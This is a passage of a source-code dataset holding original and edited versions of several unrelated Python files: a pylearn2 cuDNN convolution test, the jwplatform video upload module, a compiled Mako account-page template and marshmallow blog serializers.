        assert f(image).shape == (1, 2, 2, 2)
    def test_make_random_conv2D(self):
        """
        Test a random convolution.
        Create a random convolution and check whether the shape, axes and
        input space are all what we expect.
        """
        output_space = Conv2DSpace((2, 2), 1)
        cudnn2d = make_random_conv2D(1, self.input_space, output_space,
                                     (2, 2), 1)
        f = theano.function([self.image_tensor],
                            cudnn2d.lmul(self.image_tensor))
        assert f(self.image).shape == (1, 2, 2, 1)
        assert cudnn2d._input_space == self.input_space
        assert cudnn2d._output_axes == output_space.axes
| 35.769231 | 79 | 0.603309 | """
Tests for the Cudnn code.
"""
__author__ = "Francesco Visin"
__license__ = "3-clause BSD"
__credits__ = "Francesco Visin"
__maintainer__ = "Lisa Lab"
import theano
from theano import tensor
from theano.sandbox.cuda.dnn import dnn_available
from pylearn2.linear.conv2d import Conv2D
from pylearn2.linear.cudnn2d import Cudnn2D, make_random_conv2D
from pylearn2.space import Conv2DSpace
from pylearn2.utils import sharedX
from pylearn2.testing.skip import skip_if_no_gpu
import unittest
from nose.plugins.skip import SkipTest
import numpy as np
class TestCudnn(unittest.TestCase):
"""
Tests for the Cudnn code.
Parameters
----------
Refer to unittest.TestCase.
"""
def setUp(self):
"""
Set up a test image and filter to re-use.
"""
skip_if_no_gpu()
if not dnn_available():
raise SkipTest('Skipping tests cause cudnn is not available')
self.orig_floatX = theano.config.floatX
theano.config.floatX = 'float32'
self.image = np.random.rand(1, 1, 3, 3).astype(theano.config.floatX)
self.image_tensor = tensor.tensor4()
self.input_space = Conv2DSpace((3, 3), 1, axes=('b', 'c', 0, 1))
self.filters_values = np.ones(
(1, 1, 2, 2), dtype=theano.config.floatX
)
self.filters = sharedX(self.filters_values, name='filters')
self.batch_size = 1
self.cudnn2d = Cudnn2D(self.filters, self.batch_size, self.input_space)
def tearDown(self):
"""
After test clean up.
"""
theano.config.floatX = self.orig_floatX
def test_value_errors(self):
"""
Check correct errors are raised when bad input is given.
"""
with self.assertRaises(AssertionError):
Cudnn2D(filters=self.filters, batch_size=-1,
input_space=self.input_space)
def test_get_params(self):
"""
Check whether the cudnn has stored the correct filters.
"""
self.assertEqual(self.cudnn2d.get_params(), [self.filters])
def test_get_weights_topo(self):
"""
Check whether the cudnn has stored the correct filters.
"""
self.assertTrue(np.all(
self.cudnn2d.get_weights_topo(borrow=True) ==
np.transpose(self.filters.get_value(borrow=True), (0, 2, 3, 1))))
def test_lmul(self):
"""
Use conv2D to check whether the convolution worked correctly.
"""
conv2d = Conv2D(self.filters, self.batch_size, self.input_space,
output_axes=('b', 'c', 0, 1),)
f_co = theano.function([self.image_tensor],
conv2d.lmul(self.image_tensor))
f_cu = theano.function([self.image_tensor],
self.cudnn2d.lmul(self.image_tensor))
self.assertTrue(np.allclose(f_co(self.image), f_cu(self.image)))
def test_set_batch_size(self):
"""
Make sure that setting the batch size actually changes the property.
"""
img_shape = self.cudnn2d._img_shape
self.cudnn2d.set_batch_size(self.batch_size + 10)
np.testing.assert_equal(self.cudnn2d._img_shape[0],
self.batch_size + 10)
np.testing.assert_equal(self.cudnn2d._img_shape[1:], img_shape[1:])
def test_axes(self):
"""
Test different output axes.
Use different output axes and see whether the output is what we
expect.
"""
default_axes = ('b', 'c', 0, 1)
axes = (0, 'b', 1, 'c')
another_axes = (0, 1, 'c', 'b')
# 1, 3, 0, 2
map_to_default = tuple(axes.index(axis) for axis in default_axes)
# 2, 0, 3, 1
map_to_another_axes = tuple(default_axes.index(axis) for
axis in another_axes)
input_space = Conv2DSpace((3, 3), num_channels=1, axes=another_axes)
# Apply cudnn2d with `axes` as output_axes
cudnn2d = Cudnn2D(self.filters, 1, input_space, output_axes=axes)
f = theano.function([self.image_tensor],
cudnn2d.lmul(self.image_tensor))
# Apply cudnn2d with default axes
f_def = theano.function([self.image_tensor],
self.cudnn2d.lmul(self.image_tensor))
# Apply f on the `another_axes`-shaped image
output = f(np.transpose(self.image, map_to_another_axes))
# Apply f_def on self.image (b,c,0,1)
output_def = np.array(f_def(self.image))
# transpose output to def
output = np.transpose(output, map_to_default)
np.testing.assert_allclose(output_def, output)
np.testing.assert_equal(output_def.shape, output.shape)
def test_channels(self):
"""
Go from 2 to 3 channels and see whether the shape is correct.
"""
input_space = Conv2DSpace((3, 3), num_channels=3)
filters_values = np.ones(
(2, 3, 2, 2), dtype=theano.config.floatX
)
filters = sharedX(filters_values)
image = np.random.rand(1, 3, 3, 3).astype(theano.config.floatX)
cudnn2d = Cudnn2D(filters, 1, input_space)
f = theano.function([self.image_tensor],
cudnn2d.lmul(self.image_tensor))
assert f(image).shape == (1, 2, 2, 2)
    def test_make_random_conv2D(self):
        """
        Test a random convolution.

        Create a random convolution with ``make_random_conv2D`` and check
        that the output shape, the stored input space and the output axes
        are all what we expect.
        """
        output_space = Conv2DSpace((2, 2), 1)
        cudnn2d = make_random_conv2D(1, self.input_space, output_space,
                                     (2, 2), 1)
        f = theano.function([self.image_tensor],
                            cudnn2d.lmul(self.image_tensor))
        # One batch, 2x2 spatial output, one channel (output_space layout).
        assert f(self.image).shape == (1, 2, 2, 1)
        assert cudnn2d._input_space == self.input_space
        assert cudnn2d._output_axes == output_space.axes
| 0 | 0 | 0 |
1c3b62adbe33c307499ef5ecfd5530a3a22e0a35 | 10,715 | py | Python | jwplatform/upload.py | jwplayer/jwplayer-py | 2f478550414145e9d36b1cdf901dcf5360f8fe2b | [
"MIT"
] | 37 | 2016-09-14T20:34:42.000Z | 2022-02-15T06:47:21.000Z | jwplatform/upload.py | jwplayer/jwplayer-py | 2f478550414145e9d36b1cdf901dcf5360f8fe2b | [
"MIT"
] | 24 | 2016-11-16T21:36:13.000Z | 2022-02-18T14:37:35.000Z | jwplatform/upload.py | jwplayer/jwplayer-py | 2f478550414145e9d36b1cdf901dcf5360f8fe2b | [
"MIT"
] | 45 | 2016-10-13T08:41:35.000Z | 2022-03-06T02:31:23.000Z | import http.client
import logging
import math
import os
from dataclasses import dataclass
from enum import Enum
from hashlib import md5
from urllib.parse import urlparse
MAX_PAGE_SIZE = 1000
MIN_PART_SIZE = 5 * 1024 * 1024
UPLOAD_BASE_URL = 'upload.jwplayer.com'
MAX_FILE_SIZE = 25 * 1000 * 1024 * 1024
class UploadType(Enum):
"""
This class stores the enum values for the different type of uploads.
"""
direct = "direct"
multipart = "multipart"
@dataclass
class UploadContext:
"""
This class stores the structure for an upload context so that it can be resumed later.
"""
"""
This method evaluates whether an upload can be resumed based on the upload context state
"""
class MultipartUpload:
"""
This class manages the multi-part upload.
"""
@property
@upload_context.setter
def upload(self):
"""
This methods uploads the parts for the multi-part upload.
Returns:
"""
if self._target_part_size < MIN_PART_SIZE:
raise ValueError(f"The part size has to be at least greater than {MIN_PART_SIZE} bytes.")
filename = self._file.name
file_size = os.stat(filename).st_size
part_count = math.ceil(file_size / self._target_part_size)
if part_count > 10000:
raise ValueError("The given file cannot be divided into more than 10000 parts. Please try increasing the "
"target part size.")
# Upload the parts
self._upload_parts(part_count)
# Mark upload as complete
self._mark_upload_completion()
class SingleUpload:
"""
This class manages the operations related to the upload of a media file via a direct link.
"""
@property
@upload_context.setter
def upload(self):
"""
Uploads the media file to the actual location as specified in the direct link.
Returns:
"""
self._logger.debug(f"Starting to upload file:{self._file.name}")
bytes_chunk = self._file.read()
computed_hash = _get_bytes_hash(bytes_chunk)
retry_count = 0
for _ in range(self._upload_retry_count):
try:
response = _upload_to_s3(bytes_chunk, self._upload_link)
returned_hash = _get_returned_hash(response)
# The returned hash is surrounded by '"' character
if repr(returned_hash) != repr(f"\"{computed_hash}\""):
raise DataIntegrityError(
"The hash of the uploaded file does not match with the hash on the server.")
self._logger.debug(f"Successfully uploaded file {self._file.name}.")
return
except (IOError, PartUploadError, DataIntegrityError, OSError) as err:
self._logger.warning(err)
self._logger.exception(err, stack_info=True)
self._logger.warning(f"Encountered error uploading file {self._file.name}.")
retry_count = retry_count + 1
if retry_count >= self._upload_retry_count:
self._file.seek(0, 0)
raise MaxRetriesExceededError(f"Max retries exceeded while uploading file {self._file.name}") \
from err
except Exception as ex:
self._file.seek(0, 0)
self._logger.exception(ex)
raise
class DataIntegrityError(Exception):
"""
This class is used to wrap exceptions when the uploaded data failed a data integrity check with the current file
part hash.
"""
pass
class MaxRetriesExceededError(Exception):
"""
This class is used to wrap exceptions when the number of retries are exceeded while uploading a part.
"""
pass
class PartUploadError(Exception):
"""
This class is used to wrap exceptions that occur because of part upload errors.
"""
pass
class S3UploadError(PartUploadError):
"""
This class extends the PartUploadError exception class when the upload is done via S3.
"""
pass
class UnrecoverableError(Exception):
"""
This class wraps exceptions that should not be recoverable or resumed from.
"""
pass
| 37.996454 | 120 | 0.629585 | import http.client
import logging
import math
import os
from dataclasses import dataclass
from enum import Enum
from hashlib import md5
from urllib.parse import urlparse
MAX_PAGE_SIZE = 1000
MIN_PART_SIZE = 5 * 1024 * 1024
UPLOAD_BASE_URL = 'upload.jwplayer.com'
MAX_FILE_SIZE = 25 * 1000 * 1024 * 1024
class UploadType(Enum):
    """Enumerates the supported upload strategies."""
    direct = "direct"
    multipart = "multipart"


@dataclass
class UploadContext:
    """State needed to describe (and later resume) an in-progress upload.

    The attributes are declared as dataclass fields instead of a
    hand-written ``__init__``: the previous version defined ``__init__``
    manually under ``@dataclass``, so the decorator saw zero fields and
    generated a meaningless ``__repr__``/``__eq__``.  The generated
    constructor keeps the same positional signature
    ``(upload_method, upload_id, upload_token, direct_link)``.

    Attributes (any of them may be ``None`` when unknown):
        upload_method: One of the ``UploadType`` values, as a string.
        upload_id: Server-side identifier of the multipart upload.
        upload_token: Token authorizing the upload.
        direct_link: Pre-signed URL used for direct uploads.
    """
    upload_method: str
    upload_id: str
    upload_token: str
    direct_link: str

    def can_resume(self) -> bool:
        """Return True when this context describes a resumable upload.

        Only multipart uploads that already have both an upload token and
        an upload id can be resumed.
        """
        return self.upload_token is not None \
            and self.upload_method == UploadType.multipart.value \
            and self.upload_id is not None
def _upload_to_s3(bytes_chunk, upload_link):
    """Upload ``bytes_chunk`` to ``upload_link`` with a single HTTP PUT.

    Returns the ``http.client`` response on any 2xx status and raises
    ``S3UploadError`` (carrying the response) otherwise.  The response is
    returned without closing the connection because callers still read
    its headers (e.g. the ETag integrity check).
    """
    url_metadata = urlparse(upload_link)
    # BUG FIX: the previous check used ``url_metadata.scheme in 'https'``,
    # which is a substring test, so plain ``http`` URLs also matched and
    # were (incorrectly) sent through HTTPSConnection.  Compare exactly.
    if url_metadata.scheme == 'https':
        connection = http.client.HTTPSConnection(host=url_metadata.hostname)
    else:
        connection = http.client.HTTPConnection(host=url_metadata.hostname)
    connection.request('PUT', upload_link, body=bytes_chunk)
    response = connection.getresponse()
    if 200 <= response.status <= 299:
        return response
    raise S3UploadError(response)
def _get_bytes_hash(bytes_chunk):
return md5(bytes_chunk).hexdigest()
def _get_returned_hash(response):
return response.headers['ETag']
class MultipartUpload:
    """
    This class manages the multi-part upload.

    The file is split into parts of ``target_part_size`` bytes; pre-signed
    part links are fetched page by page from the API client, each part is
    PUT to storage with a bounded number of retries and an MD5 integrity
    check, and the upload is finally marked complete server-side.
    """
    def __init__(self, client, file, target_part_size, retry_count, upload_context: UploadContext):
        """Store the API client, source file and retry/size settings."""
        self._upload_id = upload_context.upload_id
        self._target_part_size = target_part_size
        self._upload_retry_count = retry_count
        self._file = file
        self._client = client
        self._logger = logging.getLogger(self.__class__.__name__)
        self._upload_context = upload_context
    @property
    def upload_context(self):
        """Context describing this upload (callers persist it to resume)."""
        return self._upload_context
    @upload_context.setter
    def upload_context(self, value):
        self._upload_context = value
    def upload(self):
        """
        This methods uploads the parts for the multi-part upload.

        Raises ``ValueError`` when the configured part size is below
        ``MIN_PART_SIZE`` or when the file would need more than 10000
        parts; otherwise uploads every part and marks the upload complete.
        Returns:
        """
        if self._target_part_size < MIN_PART_SIZE:
            raise ValueError(f"The part size has to be at least greater than {MIN_PART_SIZE} bytes.")
        filename = self._file.name
        file_size = os.stat(filename).st_size
        part_count = math.ceil(file_size / self._target_part_size)
        if part_count > 10000:
            raise ValueError("The given file cannot be divided into more than 10000 parts. Please try increasing the "
                             "target part size.")
        # Upload the parts
        self._upload_parts(part_count)
        # Mark upload as complete
        self._mark_upload_completion()
    def _upload_parts(self, part_count):
        """Fetch part links page by page and upload each part with retries."""
        try:
            filename = self._file.name
            remaining_parts_count = part_count
            total_page_count = math.ceil(part_count / MAX_PAGE_SIZE)
            for page_number in range(1, total_page_count + 1):
                # A "page" is a batch of up to MAX_PAGE_SIZE pre-signed links.
                batch_size = min(remaining_parts_count, MAX_PAGE_SIZE)
                page_length = MAX_PAGE_SIZE
                remaining_parts_count = remaining_parts_count - batch_size
                query_params = {'page_length': page_length, 'page': page_number}
                self._logger.debug(
                    f'calling list method with page_number:{page_number} and page_length:{page_length}.')
                body = self._retrieve_part_links(query_params)
                upload_links = body['parts']
                for returned_part in upload_links[:batch_size]:
                    part_number = returned_part['id']
                    bytes_chunk = self._file.read(self._target_part_size)
                    # Every part except the last must be exactly the target
                    # size; a short read means the file changed or I/O failed.
                    if part_number < batch_size and len(bytes_chunk) != self._target_part_size:
                        raise IOError("Failed to read enough bytes")
                    retry_count = 0
                    for _ in range(self._upload_retry_count):
                        try:
                            self._upload_part(bytes_chunk, part_number, returned_part)
                            self._logger.debug(
                                f"Successfully uploaded part {(page_number - 1) * MAX_PAGE_SIZE + part_number} "
                                f"of {part_count} for upload id {self._upload_id}")
                            break
                        except (DataIntegrityError, PartUploadError, OSError) as err:
                            self._logger.warning(err)
                            retry_count = retry_count + 1
                            self._logger.warning(
                                f"Encountered error upload part {(page_number - 1) * MAX_PAGE_SIZE + part_number} "
                                f"of {part_count} for file (unknown).")
                            if retry_count >= self._upload_retry_count:
                                # Rewind so a later attempt starts from a known state.
                                self._file.seek(0, 0)
                                raise MaxRetriesExceededError(
                                    f"Max retries ({self._upload_retry_count}) exceeded while uploading part"
                                    f" {part_number} of {part_count} for file (unknown).") from err
        except Exception as ex:
            # Rewind before re-raising so the caller can retry the whole upload.
            self._file.seek(0, 0)
            self._logger.exception(ex)
            raise
    def _retrieve_part_links(self, query_params):
        """Ask the API for one page of pre-signed part upload links."""
        resp = self._client.list(upload_id=self._upload_id, query_params=query_params)
        return resp.json_body
    def _upload_part(self, bytes_chunk, part_number, returned_part):
        """Upload one part, skipping it if an identical part already exists."""
        computed_hash = _get_bytes_hash(bytes_chunk)
        # Check if the file has already been uploaded and the hash matches. Return immediately without doing anything
        # if the hash matches.
        upload_hash = self._get_uploaded_part_hash(returned_part)
        if upload_hash and (repr(upload_hash) == repr(f"{computed_hash}")): # returned hash is not surrounded by '"'
            self._logger.debug(f"Part number {part_number} already uploaded. Skipping")
            return
        if upload_hash:
            # A part exists server-side but its content differs from what we
            # just read -- resuming would corrupt the upload, so abort.
            raise UnrecoverableError(f'The file part {part_number} has been uploaded but the hash of the uploaded part '
                                     f'does not match the hash of the current part read. Aborting.')
        if "upload_link" not in returned_part:
            raise KeyError(f"Invalid upload link for part {part_number}.")
        returned_part = returned_part["upload_link"]
        response = _upload_to_s3(bytes_chunk, returned_part)
        returned_hash = _get_returned_hash(response)
        if repr(returned_hash) != repr(f"\"{computed_hash}\""): # The returned hash is surrounded by '"' character
            raise DataIntegrityError("The hash of the uploaded file does not match with the hash on the server.")
    def _get_uploaded_part_hash(self, upload_link):
        """Return the server-side etag for this part, or None when absent."""
        upload_hash = upload_link.get("etag")
        return upload_hash
    def _mark_upload_completion(self):
        """Tell the API that all parts were uploaded successfully."""
        self._client.complete(self._upload_id)
        self._logger.info("Upload successful!")
class SingleUpload:
    """
    This class manages the operations related to the upload of a media file via a direct link.

    The whole file is read into memory, PUT to the pre-signed link and
    verified against the server-reported ETag, with a bounded number of
    retries for transient failures.
    """
    def __init__(self, upload_link, file, retry_count, upload_context: UploadContext):
        """Store the pre-signed link, source file and retry budget."""
        self._upload_link = upload_link
        self._upload_retry_count = retry_count
        self._file = file
        self._logger = logging.getLogger(self.__class__.__name__)
        self._upload_context = upload_context
    @property
    def upload_context(self):
        """Context describing this upload (callers persist it to resume)."""
        return self._upload_context
    @upload_context.setter
    def upload_context(self, value):
        self._upload_context = value
    def upload(self):
        """
        Uploads the media file to the actual location as specified in the direct link.

        Raises ``MaxRetriesExceededError`` once the retry budget is
        exhausted; any unexpected exception is logged and re-raised after
        rewinding the file.
        Returns:
        """
        self._logger.debug(f"Starting to upload file:{self._file.name}")
        # The whole file is read into memory in one chunk and hashed for
        # the post-upload integrity check.
        bytes_chunk = self._file.read()
        computed_hash = _get_bytes_hash(bytes_chunk)
        retry_count = 0
        for _ in range(self._upload_retry_count):
            try:
                response = _upload_to_s3(bytes_chunk, self._upload_link)
                returned_hash = _get_returned_hash(response)
                # The returned hash is surrounded by '"' character
                if repr(returned_hash) != repr(f"\"{computed_hash}\""):
                    raise DataIntegrityError(
                        "The hash of the uploaded file does not match with the hash on the server.")
                self._logger.debug(f"Successfully uploaded file {self._file.name}.")
                return
            except (IOError, PartUploadError, DataIntegrityError, OSError) as err:
                self._logger.warning(err)
                self._logger.exception(err, stack_info=True)
                self._logger.warning(f"Encountered error uploading file {self._file.name}.")
                retry_count = retry_count + 1
                if retry_count >= self._upload_retry_count:
                    # Rewind so the caller can retry the upload from scratch.
                    self._file.seek(0, 0)
                    raise MaxRetriesExceededError(f"Max retries exceeded while uploading file {self._file.name}") \
                        from err
            except Exception as ex:
                self._file.seek(0, 0)
                self._logger.exception(ex)
                raise
class DataIntegrityError(Exception):
    """Raised when an uploaded part's server-side hash does not match the
    locally computed hash of that part."""


class MaxRetriesExceededError(Exception):
    """Raised once the configured number of upload attempts is exhausted."""


class PartUploadError(Exception):
    """Raised when transferring a single part to storage fails."""


class S3UploadError(PartUploadError):
    """Part-upload failure reported by the S3 backend (non-2xx response)."""


class UnrecoverableError(Exception):
    """Raised for failures that must not be retried or resumed."""
| 6,027 | 0 | 415 |
5449d8703937beaae96be29dfe6aa5cc9777ee9b | 3,352 | py | Python | catalog/cached_templates/templates/users.html.py | nateyj/colonial-heritage | 1c7a4115b7bffed9b00c3375ece1641d308addf2 | [
"Apache-2.0"
] | null | null | null | catalog/cached_templates/templates/users.html.py | nateyj/colonial-heritage | 1c7a4115b7bffed9b00c3375ece1641d308addf2 | [
"Apache-2.0"
] | null | null | null | catalog/cached_templates/templates/users.html.py | nateyj/colonial-heritage | 1c7a4115b7bffed9b00c3375ece1641d308addf2 | [
"Apache-2.0"
] | null | null | null | # -*- coding:ascii -*-
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1425177385.390867
_enable_loop = True
_template_filename = '/Users/Nate/chf_dmp/account/templates/users.html'
_template_uri = 'users.html'
_source_encoding = 'ascii'
import os, os.path, re
_exports = ['content']
"""
__M_BEGIN_METADATA
{"source_encoding": "ascii", "uri": "users.html", "filename": "/Users/Nate/chf_dmp/account/templates/users.html", "line_map": {"64": 32, "65": 37, "66": 37, "35": 1, "68": 38, "74": 68, "45": 3, "27": 0, "67": 38, "52": 3, "53": 12, "54": 12, "55": 16, "56": 16, "57": 20, "58": 20, "59": 24, "60": 24, "61": 28, "62": 28, "63": 32}}
__M_END_METADATA
"""
| 36.835165 | 333 | 0.605609 | # -*- coding:ascii -*-
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1425177385.390867
_enable_loop = True
_template_filename = '/Users/Nate/chf_dmp/account/templates/users.html'
_template_uri = 'users.html'
_source_encoding = 'ascii'
import os, os.path, re
_exports = ['content']
def _mako_get_namespace(context, name):
    # Auto-generated by the Mako template compiler: look up a template
    # namespace in the render context, lazily generating this module's
    # namespaces on the first miss.  Do not hand-edit this cached module;
    # it is regenerated from the source .html template.
    try:
        return context.namespaces[(__name__, name)]
    except KeyError:
        _mako_generate_namespaces(context)
        return context.namespaces[(__name__, name)]
def _mako_generate_namespaces(context):
pass
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base.htm', _template_uri)
def render_body(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
user = context.get('user', UNDEFINED)
def content():
return render_content(context._locals(__M_locals))
__M_writer = context.writer()
__M_writer('\n\n')
if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):
context['self'].content(**pageargs)
return ''
finally:
context.caller_stack._pop_frame()
def render_content(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
user = context.get('user', UNDEFINED)
def content():
return render_content(context)
__M_writer = context.writer()
__M_writer(
'\n\n<div>\n <h1 class="page-header text-left">My Account</h1>\n</div>\n\n<table id="users_table" class="table table-striped">\n <tr>\n <td>First Name</td>\n <td>')
__M_writer(str(user.first_name))
__M_writer('</td>\n </tr>\n <tr>\n <td>Last Name</td>\n <td>')
__M_writer(str(user.last_name))
__M_writer('</td>\n </tr>\n <tr>\n <td>Username</td>\n <td>')
__M_writer(str(user.username))
__M_writer('</td>\n </tr>\n <tr>\n <td>Security Question</td>\n <td>')
__M_writer(str(user.security_question))
__M_writer('</td>\n </tr>\n <tr>\n <td>Security Answer</td>\n <td>')
__M_writer(str(user.security_answer))
__M_writer('</td>\n </tr>\n <tr>\n <td>Email</td>\n <td>')
__M_writer(str(user.email))
__M_writer('</td>\n </tr>\n</table>\n\n<div>\n <a class="btn btn-primary" href="/account/users.edit/')
__M_writer(str(user.id))
__M_writer('/">Edit</a>\n <a class="btn btn-primary" href="/account/users.delete/')
__M_writer(str(user.id))
__M_writer('/">Delete</a>\n</div>\n\n')
return ''
finally:
context.caller_stack._pop_frame()
"""
__M_BEGIN_METADATA
{"source_encoding": "ascii", "uri": "users.html", "filename": "/Users/Nate/chf_dmp/account/templates/users.html", "line_map": {"64": 32, "65": 37, "66": 37, "35": 1, "68": 38, "74": 68, "45": 3, "27": 0, "67": 38, "52": 3, "53": 12, "54": 12, "55": 16, "56": 16, "57": 20, "58": 20, "59": 24, "60": 24, "61": 28, "62": 28, "63": 32}}
__M_END_METADATA
"""
| 2,456 | 0 | 115 |
11d8435c09250104be6bc54f46e1e26899f5e541 | 9,456 | py | Python | server/pages/post/modules/serializer.py | Danutu89/NewApp-V2 | ffec4afc1bd0bb8663584b7baf6c7941b2c3f781 | [
"MIT"
] | 1 | 2020-05-26T20:36:39.000Z | 2020-05-26T20:36:39.000Z | server/pages/post/modules/serializer.py | Danutu89/NewApp-V2 | ffec4afc1bd0bb8663584b7baf6c7941b2c3f781 | [
"MIT"
] | 4 | 2021-03-31T19:47:15.000Z | 2022-03-12T00:31:17.000Z | server/pages/post/modules/serializer.py | Danutu89/NewApp-V2 | ffec4afc1bd0bb8663584b7baf6c7941b2c3f781 | [
"MIT"
] | null | null | null | from marshmallow import fields, Schema
from marshmallow_sqlalchemy import SQLAlchemyAutoSchema, ModelSchema
from models import Saved_Posts, Post_Likes, User_Following, User, Post_Info, Post, Post_Tags, Comment_Likes, Reply_Likes
from sqlalchemy import and_
from .utilities import cleanhtml
import re
from app import db
PostSchemaOnly = PostSchema(many=False)
| 25.626016 | 179 | 0.552453 | from marshmallow import fields, Schema
from marshmallow_sqlalchemy import SQLAlchemyAutoSchema, ModelSchema
from models import Saved_Posts, Post_Likes, User_Following, User, Post_Info, Post, Post_Tags, Comment_Likes, Reply_Likes
from sqlalchemy import and_
from .utilities import cleanhtml
import re
from app import db
class AuthorLocation(Schema):
country = fields.Method('getCountry')
flag = fields.Method('getFlag')
class Meta:
fields = (
'country',
'flag'
)
def getCountry(self, obj):
return obj.location.country
def getFlag(self, obj):
return obj.location.flag
class PostTagSchema(Schema):
class Meta:
fields = (
'name',
'color',
'icon'
)
class PostTagsSchema(Schema):
name = fields.Method('getName')
color = fields.Method('getColor')
icon = fields.Method('getIcon')
class Meta:
fields = (
'name',
'color',
'icon'
)
def getName(self, obj):
return obj.tag.name
def getColor(self, obj):
return obj.tag.color
def getIcon(self, obj):
return obj.tag.icon
class PostInfoMinSchema(Schema):
posted_on = fields.Method('getTimeAgo')
likes_count = fields.Method('getLikesCount')
tags = fields.Nested(PostTagsSchema, many=True)
class Meta:
fields = (
'thumbnail',
'posted_on',
'likes_count',
'tags',
)
def getTimeAgo(self, obj):
return obj.time_ago()
def getLikesCount(self, obj):
return len(obj.likes)
class AuthorInfoMinSchema(Schema):
    """Minimal author profile: avatar plus a derived display name."""
    full_name = fields.Method('getFullName')
    class Meta:
        fields = (
            'avatar_img',
            'full_name'
        )
    def getFullName(self, obj):
        """Join first and last name into a single display string."""
        return ' '.join((obj.first_name, obj.last_name))
class AuthorMinSchema(Schema):
info = fields.Nested(AuthorInfoMinSchema)
class Meta:
fields = (
'name',
'info'
)
class PostMinSchema(Schema):
    """Compact post representation used in listings and profile pages."""
    author = fields.Nested(AuthorMinSchema)
    info = fields.Nested(PostInfoMinSchema)
    saved = fields.Method('ifSaved')
    tags = fields.Nested(PostTagsSchema, many=True)
    class Meta:
        fields = (
            'title',
            'read_time',
            'author',
            'info',
            'link',
            'saved',
            'tags'
        )
    def ifSaved(self, obj):
        """Return True when the requesting user has saved this post."""
        viewer = self.context.get('currentUser')
        if not viewer:
            return False
        match = Saved_Posts.get().filter(
            and_(Saved_Posts.user == viewer.id,
                 Saved_Posts.post == obj.id)).first()
        return bool(match)
class RepliesSchema(Schema):
    """Serializes a reply to a comment, including viewer-specific flags."""
    author = fields.Nested(AuthorMinSchema)
    mentions = fields.Method('getMentions')
    userInfo = fields.Method('getUserInfo')
    class Meta:
        fields = (
            'author',
            'text',
            'mentions',
            'id',
            'userInfo'
        )
    def getMentions(self, obj):
        """Return the @-mentions in the reply text that match real users."""
        m = []
        mentions = re.findall("@([a-zA-Z0-9]{1,15})", cleanhtml(obj.text))
        for mention in mentions:
            check = User.get().filter_by(name=mention).first()
            if check is not None:
                m.append(mention)
        return m
    def getUserInfo(self, obj):
        """Return per-viewer flags: whether the viewer liked/owns this reply."""
        currentUser = self.context.get('currentUser')
        if currentUser:
            # BUG FIX: the 'liked' filter previously mixed tables by using
            # Post_Likes.post == obj.id inside a Reply_Likes query, so the
            # flag never reflected likes on this reply.  Filter on the
            # Reply_Likes row for this reply instead.
            # TODO(review): confirm the FK column on Reply_Likes is named
            # 'reply' (mirrors Comment_Likes.comment / Post_Likes.post).
            liked = Reply_Likes.get().filter(
                and_(Reply_Likes.author == currentUser.id,
                     Reply_Likes.reply == obj.id)).first() is not None
            return {
                'liked': liked,
                'mine': obj.author.id == currentUser.id,
            }
        else:
            return {
                'liked': False,
                'mine': False,
            }
class CommentsSchema(Schema):
author = fields.Nested(AuthorMinSchema)
replies = fields.Nested(RepliesSchema, many=True)
mentions = fields.Method('getMentions')
userInfo = fields.Method('getUserInfo')
class Meta:
fields = (
'author',
'text',
'replies',
'mentions',
'id',
'userInfo'
)
def getMentions(self, obj):
m = []
mentions = re.findall("@([a-zA-Z0-9]{1,15})", cleanhtml(obj.text))
for mention in mentions:
check = User.get().filter_by(name=mention).first()
if check is not None:
m.append(mention)
return m
def getUserInfo(self, obj):
currentUser = self.context.get('currentUser')
if currentUser:
return {
'liked': True if Comment_Likes.get().filter(and_(Comment_Likes.author==currentUser.id, Comment_Likes.comment==obj.id)).first() is not None else False,
'mine': True if obj.author.id == currentUser.id else False,
}
else:
return {
'liked': False,
'mine': False,
}
class PostLikesSchema(Schema):
name = fields.Method('getName')
color = fields.Method('getColor')
icon = fields.Method('getIcon')
class Meta:
fields = (
'name',
'color',
'icon',
)
def getName(self, obj):
return obj.like.name
def getColor(self, obj):
return obj.like.color
def getIcon(self, obj):
return obj.like.icon
class PostInfoSchema(Schema):
posted_on = fields.Method('getTimeAgo')
likes_count = fields.Method('getLikesCount')
tags = fields.Nested(PostTagsSchema, many=True)
description = fields.Method('getDesc')
keywords = fields.Method('getKeywords')
comments = fields.Nested(CommentsSchema, many=True)
class Meta:
fields = (
'thumbnail',
'posted_on',
'likes_count',
'tags',
'text',
'description',
'keywords',
'closed',
'closed_on',
'closed_by',
'comments'
)
def getTimeAgo(self, obj):
return obj.time_ago()
def getLikesCount(self, obj):
return len(obj.likes)
def getDesc(self, obj):
return cleanhtml(obj.text)[:97]
def getKeywords(self, obj):
return ', '.join([key.tag.name for key in obj.tags])
class AuthorPersSchema(Schema):
class Meta:
fields = (
'profession',
)
class AuthorInfoSchema(Schema):
full_name = fields.Method('getFullName')
joined_on = fields.Method('getJoinedOn')
class Meta:
fields = (
'avatar_img',
'full_name',
'joined_on'
)
def getFullName(self, obj):
return obj.first_name + ' ' + obj.last_name
def getJoinedOn(self, obj):
return str(obj.created_on.ctime())[:-14] + ' ' + str(obj.created_on.ctime())[20:]
class LanguageSchema(Schema):
class Meta:
fields = (
'code',
'name'
)
class AuthorSchema(Schema):
info = fields.Nested(AuthorInfoSchema)
posts = fields.Nested(PostMinSchema, many=True)
location = fields.Nested(AuthorLocation)
language = fields.Nested(LanguageSchema)
pers = fields.Nested(AuthorPersSchema)
class Meta:
fields = (
'name',
'info',
'posts',
'location',
'pers',
'language'
)
class PostLikes(Schema):
class Meta:
fields = (
'author',
'info'
)
class PostSchema(Schema):
author = fields.Nested(AuthorSchema)
info = fields.Nested(PostInfoSchema)
userInfo = fields.Method('getUserInfo')
class Meta:
fields = (
'title',
'read_time',
'author',
'info',
'link',
'userInfo',
'id'
)
def getUserInfo(self, obj):
currentUser = self.context.get('currentUser')
if currentUser:
return {
'liked': True if Post_Likes.get().filter(and_(Post_Likes.author==currentUser.id, Post_Likes.post==obj.id)).first() is not None else False,
